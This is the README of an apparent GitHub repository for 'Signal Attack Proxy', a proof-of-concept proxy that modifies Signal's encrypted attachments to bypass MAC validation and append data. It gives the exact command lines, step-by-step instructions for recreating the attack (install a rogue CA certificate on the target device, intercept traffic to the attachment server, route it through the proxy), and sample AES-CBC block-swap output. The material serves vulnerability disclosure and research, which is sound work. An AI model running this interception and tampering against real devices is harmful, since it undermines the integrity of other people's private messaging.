Switch branches/tags
Nothing to show
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
..
Failed to load latest commit information.
README.md
blockswap.py
notanissue.mp3
reorder.py
sap-thatsnotwhatisaid.py

README.md

Signal Attack Proxy

This is a PoC the vulnerabilities found in the Signal Private Messenger. It is acting as a proxy and will modify encrypted attachments in a way so that the MAC validation is bypassed and 4GB of data is attached.

You can specify ranges of blocks to attach to the original attachment. E.g. the ranges "0-100,1000-2000,0-100" would append blocks 0 to 100 followed by blocks 1000-2000 and then again 0-100 to the attachment. Blocks are AES blocks of 16bytes.

Example Demonstrating the MP3 Robustness

./reorder.py notanissue.mp3 0-2700,4000-4320,4500-6320,6800-7400,6800-7400,6800-7400,6800-7400,4500-5380,6800-7400,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450 > test.mp

mplayer test.mp3

Example Attack Against Signal

./sap-thatsnotwhatisaid.py --encoding <encoding (gzip only)> --blocks ,

To recreate the video found at https://www.youtube.com/watch?v=brN6D9Fc4dc do the following:

  1. Install a rouge CA certificate on your Android device (or use a real one if you got one ;)
  2. Start the proxy using the cmdline sap-thatsnotwhatisaid.py --encoding gzip --blocks 0-2700,4000-4320,4500-6320,6800-7400,6800-7400,6800-7400,6800-7400,4500-5380,6800-7400,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380
  3. Intercept the request to the Signal attachment server and forward it to the host running sap-thatsnotwhatisaid.py, port 8000.
  4. Send the notanissue.mp3 from another signal contact to the Android device.
  5. Profit.

Example of AES-CBC Malleability

./blockswap.py k = bda0563c8febf4768ab4fc92571677fc iv = 83e5758d22ccf7a5222d163577142fd5

enc: 00000000000000000000000000000000 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff -> e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448

dec: e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448 e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448 e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448 -> 00000000000000000000000000000000 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff 7569bc01fb054e778ca0ed156b780b9d 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff 7569bc01fb054e778ca0ed156b780b9d 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff

dec: e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448 e19a87080971c397e6aa338ee10c8767 b64314496bd52ef39783e9009e5418b3 6d0b9b63cc22194bccc3f8db99fac13b e09b86090870c296e7ab328fe00d8666 1ce9bee3c17f84593d2943aa34feb219 f68cc98cd9c9b9d2ae8dfb201c6c2448 -> 00000000000000000000000000000000 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff 2fcb289c29e971e526d289f3ff6f680d 40404040404040404040404040404040 fcbd0d1f2e555bd07c612711b9023f2b eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee 622080ba795c6a8b4fffc37ec69d551e 55555555555555555555555555555555